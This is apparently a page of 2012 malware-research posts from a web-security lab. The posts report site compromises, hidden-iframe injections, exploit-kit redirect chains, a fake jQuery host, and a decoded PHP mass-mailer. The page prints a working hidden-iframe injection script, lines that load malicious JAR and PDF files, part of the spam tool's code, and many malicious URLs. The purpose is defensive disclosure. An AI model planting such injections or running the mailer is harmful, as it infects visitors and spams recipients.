bookmark_borderIframes generator: http://wordpresstest2.info/1.txt

If your site is loading hidden iframes from *.ftp1.biz/pony, look for a curlor file_get_contents call to http://wordpresstest2.info/1.txt.When you visit this site, it generates random iframes:

http://lsghmr.ftp1.biz/pony ( 206.212.240.20)
http://rchscbul.ftp1.biz/pony ( 206.212.240.20)
http://idzui.ftp1.biz/pony
http://vtfptnmxk.ftp1.biz/pony

That are displayed on the compromised sites.

bookmark_borderMass infections from fenwaywest.com/media/index.php

We are seeing a large number of sites compromised with an iframe pointing to http://fenwaywest.com/media/index.php .Just in the last 3 days, we identified almost 10,000 sites with it:

2012/Oct/11 - 4393 sites - http://fenwaywest.com/media/index.php
2012/Oct/10 - 3117 sites - http://fenwaywest.com/media/index.php
2012/Oct/09 -  865 sites - http://fenwaywest.com/media/index.php

On all the compromised sites have the iframes similar to this one:

<script> function frmAdd() { var ifrm = document.createElement("iframe"); ifrm. style.position="absolute'; ifrm.style.top='-999em'; ifrm.style.left='-999em';  ifrm.src = "http://fenwaywest.com/media/index.php";ifrm.id = 'frmId';document.body. appendChild (ifrm);};window.onload = frmAdd;..

The domain is hosted at 50.28.53.157, but currently offline (redirecting to Google), so we can\’t really tell what it is doing. But on previous requests, it was redirecting to a TDS (traffic distribution system) and from there, being sent to multiple spam or malicious domains.

bookmark_borderbadgeplz.com Compromised

Update 2012/Oct/12: Their site was fixed and is not loading malware anymore.

If you are using any widget/code from http://badgeplz.com/, remove it asapfrom your site. It has been compromised and is serving malicious code. So ifyou have any widget from there, it will be loaded from your site as well (blackhole exploit kit).

Example:

$ curl -D - http://badgeplz.com/instagram/?u=user
<script>v="va"+"l";try{ebgserb++;}catc h(snregrx){try{(Math+"")()}catch(ztbet) {m= ..

Note only that, but their main site is compromised as well.

bookmark_borderIframes to redkit exploit kit

A New batch of compromised sites are being infected with hidden iframes leading to the Redkit exploit kit. A site gets hacked and an iframe similar to this one is added::

<iframe src="http://ad-d-to.com.br.ms:81/rem2.html..

Once that is loaded into the browser, it redirects anyone visiting the site to:

http://orcasp.com.br/43745180.html

Where it tries to make the browser load some malicious PDFs or Jar files:

<applet archive="http://orcasp.com.br/33256.jar"..

<iframe src="http://orcasp.com.br/98765.pdf"..

And if you are running an outdated version of Java or Adobe PDF, your personal computer would get compromised as well.

bookmark_borderFake jquery site

Seeing many sites with a fake jquery links on them from jquery-framework.com (justregistered on 2012/08/05)::

<script src="httx://jquery-framework.com/jquery-1.7.1.js..

If you use jquery, make sure to link to reliable sources (either jquery.org or googleapis). This one is redirecting usersto http://browser-31.com/s/3013.

bookmark_borderRebots.php on WordPress

We are seeing a new batch of the rebots.php infections on WordPress and one thingis intriguing us. On many sites we are analysing, WordPress is updated and no suspiciousbackdoors or plugins were found. All in order, except for the javascript injected inside the theme.

The only thing in common on them is a single login to wp-admin, followed by a visit towp-admin/theme-editor.php to modify the theme:

184.22.164.xx - - [29/Aug/2012:21:03:02 -0300] "POST ///wp-login.php HTTP/1.1" 302 - "-" ""

184.22.164.xx - - [29/Aug/2012:21:03:13 -0300] "POST //wp-admin/theme-editor.php HTTP/1.1" 302 -
"-" ""

184.22.164.xx - - [22/Aug/2012:21:03:16 -0300] "GET //wp-admin//theme-editor.php?file=index.php&theme=classic&scrollto=0&updated=true HTTP/1.1" 200 58188 "-" ""

So it seems someone was able to steal the wp-admin password and edit the theme. It was done automatically, since no CSS or .JS files were loaded.

Another intereting issue is that on some of these sites, we didn\’t identify any brute force attack trying to guess the passwords. Just this single login.

Since we don\’t know how these passwords got stolen, we recommend people to change their wp-admin passwords asap until we have more info (specially if you have been compromised with the rebots.php injection).

bookmark_borderServer-wide iframe injections

Dennis (from unmask) posted about some iframe injections that he has beenseeing lately: RFI: Server-wide iframe injections.

The post is interesting, so read that first. We are also seeing many variationsof this attack, always with the iframes being injected as domain.com/[randomnumbers].html and redirecting the user to Fake AV. This are some of the URLs we are seeing:

     15 http://tiergefluester.ch/37624443.html
      8 http://qmg2.com/96344443.html
      6 http://52943578.nl.strato-hosting.eu/49404443.html
      5 http://nw-transporte.de/31374443.html
      4 http://soka.saitama-eastern.jp/68844443.html
      3 http://tvhr9.com/59304443.html
      3 http://tvhr9.com/48204443.html
      3 http://tijerasycosmetica.es/32154443.html
      3 http://sepatch.org/74734443.html
      3 http://qmg2.com/51204443.html
      3 http://photopassion34.eu/84364443.html
      2 http://sipsnstrokesstudios.com/90144443.html
      2 http://relance-clients.com/18304443.html
      2 http://langaz.pl/28074443.html
      2 http://kopian.net.pl/10344443.html
      2 http://huskiesfootball.ca/54924443.html
      2 http://humourr.com/77204443.html
      2 http://fam-vandenberg.nl/33604443.html
      2 http://dev.look-whos-talking.co.uk/75584443.html
      2 http://cadeauxentreprise.ca/40104443.html
      1 http://www.sportman.nl/44554443.html
      1 http://vanaden.nl/76644443.html
      1 http://tvhr9.com/92824443.html
      1 http://tvhr9.com/15374443.html
      1 http://tijerasycosmetica.es/68134443.html
      1 http://tiergefluester.ch/71834443.html
      1 http://tiergefluester.ch/47254443.html
      1 http://thomasvillefurnishings.ca/66124443.html
      1 http://soka.saitama-eastern.jp/76924443.html
      1 http://soka.saitama-eastern.jp/31164443.html
      1 http://sipsnstrokesstudios.com/82464443.html
      1 http://shopmassive.com/72534443.html
      1 http://shopmassive.com/60754443.html
      1 http://shopmassive.com/50284443.html
      1 http://sepatch.org/58814443.html
      1 http://sepatch.org/35224443.html
      1 http://sepatch.org/14244443.html
      1 http://santeayurveda.com/48804443.html
      1 http://sacem.com.tr/95534443.html
      1 http://s1050444.iie.nl/76384443.html
      1 http://roswitha-jacobi.de/67874443.html
      1 http://roswitha-jacobi.de/52194443.html
      1 http://roswitha-jacobi.de/22914443.html
      1 http://roswitha-jacobi.de/15584443.html
      1 http://reisendefamilie.net/70004443.html
      1 http://rectol.com/76084443.html
      1 http://rectol.com/11154443.html
      1 http://radiocanvas.co.uk/97984443.html
      1 http://qmg2.com/82474443.html
      1 http://qmg2.com/76574443.html
      1 http://qmg2.com/74054443.html
      1 http://qmg2.com/34794443.html
      1 http://qmg2.com/20054443.html
      1 http://qmg2.com/14934443.html
      1 http://pohlgruppe.de/89314443.html
      1 http://pohlgruppe.de/73684443.html
      1 http://photopassion34.eu/93154443.html
      1 http://photopassion34.eu/35484443.html
      1 http://ozturannakliyat.com/94564443.html
      1 http://opracowaniagraficzne.pl/10474443.html
      1 http://nw-transporte.de/96284443.html
      1 http://mukogawa.jp/98984443.html
      1 http://moodle.fortpointdesign.com/31844443.html
      1 http://missweekderbesten.nl/12714443.html
      1 http://lojastelefrio.com.br/18854443.html
      1 http://linkeddoc.com/31974443.html
      1 http://langaz.pl/16524443.html
      1 http://kulycap.fr/63464443.html
      1 http://kopian.net.pl/69004443.html
      .. many many more ...

Note that all (or most) of these sites are compromised and being used by the attackers to spread malware botnet style. Dennis also questioned how are these sites being hacked.

Initially, all of them were running Plesk (at least I could access it as site.com:8443). However, as the infection is growing, I am seeing many sites not using Plesk with this type of malware, so we can\’t know for sure. We assume it is a mix of attacks (brute force FTP + outdated Plesk + anything they can find).

bookmark_borderFake AV redirections .ru -> .pl

We posted yesterday about the Blackmuscats .htaccess redirection that was affecting thousands of web sites.

They are still happening (and growing), but the attackers decided to switch names to nonalco, mimosa and otherrandom keywords for their files:

1251    redirections    http://fitnes-corp.ru/shurimuri?5
1093    redirections    http://infofitnes.ru/interactive?5
818 redirections    http://fitnes-company.ru/interactive?5
817 redirections    http://mir-fitnes.ru/interactive?5
802 redirections    http://info-fitnes.ru/interactive?5
788 redirections    http://fitnescompany.ru/interactive?5
268 redirections    http://fitnes-corp.ru/shurimuri?5
220 redirections    http://infofitnes.ru/interactive?5
188 redirections    http://cofitnes.ru/mimosa?5
177 redirections    http://mir-fitnes.ru/interactive?5
168 redirections    http://fitnes-company.ru/interactive?5
165 redirections    http://info-fitnes.ru/interactive?5
162 redirections    http://fitnescompany.ru/interactive?5
79  redirections    http://fitnescorp.ru/shurimuri?5
40  redirections    http://nashfitnes.ru/nonalco?5
37  redirections    http://cofitnes.ru/mimosa?5
1191    redirections    http://nashfitnes.ru/nonalco?5
981 redirections    http://nash-fitnes.ru/nonalco?5
953 redirections    http://supasweb.ru/blackmuscats?5
920 redirections    http://nashifitnes.ru/nonalco?5
895 redirections    http://nashafitnes.ru/nonalco?5
878 redirections    http://nasha-fitnes.ru/nonalco?5
555 redirections    http://fitnes-ltd.ru/shurimuri?5
261 redirections    http://nashfitnes.ru/nonalco?5
208 redirections    http://supasweb.ru/blackmuscats?5
199 redirections    http://nash-fitnes.ru/nonalco?5
190 redirections    http://nashafitnes.ru/nonalco?5
189 redirections    http://nashifitnes.ru/nonalco?5
180 redirections    http://nasha-fitnes.ru/nonalco?5
116 redirections    http://fitnes-ltd.ru/shurimuri?5

The redirection is still the same, going from those .ru domains, to additional second level .ru domains and themto a .pl:

http://russian-fitnes.ru/prunus/cerasus.php
http://www1.vulnerabilitytoolssolver.pl/18o8e9/al/1fedfba29dd0193d/pr2/0/
http://www1.antivirusworrydanger.pl/370l3591/al/1fedfba29dd0193d/pr2/0/
http://minimizerprocessesdebugger.pl/b6l1s/al/78dee9e271084cb2/pr2/238/
http://www1.stabilityprotectionscanner.pl/n9044s5/al/1fedfba29dd0193d/pr2/0/

So far we have identified more than 17,000 sites with this type of malware. More details as we track them.

bookmark_borderPHP Spam tool (UnixStats Mass MaiLer)

While looking at a compromised site, we found an interesting mass mailer in there. The content was encoded using eval/gzinflate and base64_decode:

But when switching the “eval” for “print” we could see the mass mailer hidden and what it was doing:

$secure = “racrewmania@googlemail.com”; @$action=$_POST[‘action’]; @$from=$_POST[‘from’]; @$realname=$_POST[‘realname’]; @$replyto=$_POST[‘replyto’]; @$subject=$_POST[‘subject’]; @$message=$_POST[‘message’]; @$emaillist=$_POST[’emaillist’]; @$file_name=$_FILES[‘file’][‘name’]; @$contenttype=$_POST[‘contenttype’]; @$file=$_FILES[‘file’][‘tmp_name’]; @$amount=$_POST[‘amount’]; set_time_limit(intval($_POST[‘timelimit’])); ..<title>UnixStats Mass MaiLer</title>..for($xx=0; $xx<$amount; $xx++){ for($x=0; $x<$numemails; $x++){ $to = $allemails[$x]; if ($to){ $to = ereg_replace(” “, “”, $to); $message = ereg_replace(“&email&”, $to, $message); $subject = ereg_replace(“&email&”, $to, $subject); print “Sending mail to $to…….”; flush(); $header = “From: $realname <$from>rnReply-To: $replytorn”; $header .= “MIME-Version: 1.0rn”; If ($file_name) $header .= “Content-Type: multipart/mixed; boundary=$uidrn”; If ($file_name) $header .= “–$uidrn”; $header .= “Content-Type: text/$contenttypern”; $header .= “Content-Transfer-Encoding: 8bitrnrn”; $header .= “$messagern”; If ($file_name) $header .= “–$uidrn”; If ($file_name) $header .= “Content-Type: $file_type; name=”$file_name””rn””; If ($file_name) $header .= “”Content-Transfer-Encoding: base64rn””; If ($file_name) $header .= “”Content-Disposition: attachment; filename=””$file_name””rnrn””; If ($file_name) $header .= “”$contentrn””; If ($file_name) $header .= “”–$uid–“”; mail($to</p></div></article></main></div></div><div><nav class=”navigation post-navigation” role=”navigation” aria-label=”Posts”><h2 class=”screen-reader-text”>Post navigation</h2><div class=”nav-links”><div class=”nav-previous”><a href=”https://labs.sucuri.net/flagging-google-com-as-malware/” rel=”prev”>Flagging google.com as malware</a></div><div class=”nav-next”><a href=”https://labs.sucuri.net/strange-htaccess-redirections-to-google-com/” rel=”next”>Strange .htaccess redirections to google.com</a></div></div></nav></div><footer id=”colophon” class=”site-footer”><div class=”site-info”> <a href=”https://wordpress.org/”> Proudly powered by WordPress </a> <span class=”sep”> | </span> Theme: sucurikb by <a href=”http://underscores.me/”>Underscores.me</a>.</div></footer></div><footer id=”sucuri-docs-footer”><div class=”sucuri-docs-footer-container”><div class=”grid-container”><div class=”grid-x grid-margin-x”><div class=”cell large-2″><p class=”sucuri-docs-footer-menu-heading”>PRODUCTS</p><div class=”menu-products-container”><ul id=”menu-products” class=”menu”><li id=”menu-item-595″ class=”menu-item menu-item-type-custom menu-item-object-custom menu-item-595″><a href=”https://sucuri.net/website-firewall/”>Website Firewall</a></li><li id=”menu-item-596″ class=”menu-item menu-item-type-custom menu-item-object-custom menu-item-596″><a href=”https://sucuri.net/website-security-platform/”>Website Antivirus</a></li><li id=”menu-item-597″ class=”menu-item menu-item-type-custom menu-item-object-custom menu-item-597″><a href=”https://sucuri.net/website-backups/”>Website Backups</a></li><li id=”menu-item-598″ class=”menu-item menu-item-type-custom menu-item-object-custom menu-item-598″><a href=”https://sucuri.net/wordpress-security/”>WordPress Security</a></li><li id=”menu-item-599″ class=”menu-item menu-item-type-custom menu-item-object-custom menu-item-599″><a href=”https://sucuri.net/custom/enterprise/”>Enterprise Services</a></li></ul></div></div><div class=”cell large-2″><p class=”sucuri-docs-footer-menu-heading”>SOLUTIONS</p><div class=”menu-solutions-container”><ul id=”menu-solutions” class=”menu”><li id=”menu-item-606″ class=”menu-item menu-item-type-custom menu-item-object-custom menu-item-606″><a href=”https://sucuri.net/website-firewall/ddos-protection”>DDoS Protection</a></li><li id=”menu-item-607″ class=”menu-item menu-item-type-custom menu-item-object-custom menu-item-607″><a href=”https://sucuri.net/website-security-platform/malware-scanning-and-detection”>Malware Detection</a></li><li id=”menu-item-608″ class=”menu-item menu-item-type-custom menu-item-object-custom menu-item-608″><a href=”https://sucuri.net/website-security-platform/malware-removal”>Malware Removal</a></li><li id=”menu-item-609″ class=”menu-item menu-item-type-custom menu-item-object-custom menu-item-609″><a href=”https://sucuri.net/website-firewall/stop-website-attacks-and-hacks”>Malware Prevention</a></li><li id=”menu-item-610″ class=”menu-item menu-item-type-custom menu-item-object-custom menu-item-610″><a href=”https://sucuri.net/website-security-platform/blacklist-removal-and-repair”>Blacklist Removal</a></li></ul></div></div><div class=”cell large-2″><p class=”sucuri-docs-footer-menu-heading”>SUPPORT</p><div class=”menu-support-container”><ul id=”menu-support” class=”menu”><li id=”menu-item-600″ class=”menu-item menu-item-type-custom menu-item-object-custom menu-item-600″><a href=”https://blog.sucuri.net/”>Blog</a></li><li id=”menu-item-601″ class=”menu-item menu-item-type-custom menu-item-object-custom menu-item-601″><a href=”https://kb.sucuri.net/”>Knowledge Base</a></li><li id=”menu-item-602″ class=”menu-item menu-item-type-custom menu-item-object-custom menu-item-602″><a href=”https://sitecheck.sucuri.net/”>SiteCheck</a></li><li id=”menu-item-603″ class=”menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-603″><a href=”https://labs.sucuri.net/”>Research Labs</a></li><li id=”menu-item-604″ class=”menu-item menu-item-type-custom menu-item-object-custom menu-item-604″><a href=”https://sucuri.net/faq”>FAQ</a></li><li id=”menu-item-605″ class=”menu-item menu-item-type-custom menu-item-object-custom menu-item-605″><a href=”https://abuse.sucuri.net/”>Report Abuse</a></li></ul></div></div><div class=”cell large-2″><p class=”sucuri-docs-footer-menu-heading”>COMPANY</p><div class=”menu-company-container”><ul id=”menu-company” class=”menu”><li id=”menu-item-611″ class=”menu-item menu-item-type-custom menu-item-object-custom menu-item-611″><a href=”https://sucuri.net/company”>About</a></li><li id=”menu-item-612″ class=”menu-item menu-item-type-custom menu-item-object-custom menu-item-612″><a href=”https://sucuri.net/company/media”>Media</a></li><li id=”menu-item-613″ class=”menu-item menu-item-type-custom menu-item-object-custom menu-item-613″><a href=”https://sucuri.net/company/events”>Events</a></li><li id=”menu-item-614″ class=”menu-item menu-item-type-custom menu-item-object-custom menu-item-614″><a href=”https://sucuri.net/company/employment”>Employment</a></li><li id=”menu-item-615″ class=”menu-item menu-item-type-custom menu-item-object-custom menu-item-615″><a href=”https://sucuri.net/company/contact-us”>Contact</a></li><li id=”menu-item-616″ class=”menu-item menu-item-type-custom menu-item-object-custom menu-item-616″><a href=”https://sucuri.net/customers/”>Testimonials</a></li></ul></div></div><div class=”cell large-4 text-center”><div class=”footer-social-icons”><ul class=”list-inline”><li class=”list-inline-item”><a class=”p-ft-social-fb” href=”https://www.facebook.com/SucuriSecurity” target=”_blank” rel=”noopener noreferrer”><i class=”social-icon facebook”></i></a></li><li class=”list-inline-item”><a class=”p-ft-social-tw” href=”https://twitter.com/sucurisecurity” target=”_blank” rel=”noopener noreferrer”><i class=”social-icon twitter”></i></a></li><li class=”list-inline-item”><a class=”p-ft-social-ld” href=”https://www.linkedin.com/company/899487″ target=”_blank” rel=”noopener noreferrer”><i class=”social-icon linkedin”></i></a></li><li class=”list-inline-item”><a class=”p-ft-social-ig” href=”https://www.instagram.com/sucurisecurity/” target=”_blank” rel=”noopener noreferrer”><i class=”social-icon instagram”></i></a></li></ul></div><div><p><a href=”https://dashboard.sucuri.net/login/” class=”btn login mp-ft-login auto-track” data-gatrack=”Button_Click, Footer_Login”>Customer Login</a></p></div><div class=”footer-logo-wrapper”> <a href=”/” class=”footer-logo”></a></div></div></div></div><div class=”grid-container sucuri-docs-footer-b”><hr><div class=”grid-x grid-margin-x”><div class=”cell medium-8 large-8″><ul class=”list-inline unstyled-list”><li class=”list-inline-item”><a class=”mp-ft-copyright-terms auto-track” data-gatrack=”Button_Click, Footer_Terms_Of_Use” href=”/terms-of-service”>Terms of Use</a></li><li class=”list-inline-item”><a class=”mp-ft-copyright-priv auto-track” data-gatrack=”Button_Click, Footer_Privacy_Policy” href=”/privacy-policy”>Privacy Policy</a></li><li class=”list-inline-item”><a class=”mp-ft-copyright-faq auto-track” data-gatrack=”Button_Click, Footer_FAQ” href=”/faq”>Frequently Asked Questions</a></li></ul></div><div class=”cell medium-4 large-4 copyright text-center”><p>© 2020 Sucuri Inc. All rights reserved.</p></div></div></div></div></footer> <script src=”https://labs.sucuri.net/wp-content/cache/min/1/7a7f2154ed98976f1f4d0d6faaeb245e.js” data-minify=”1″></script></body></html></p>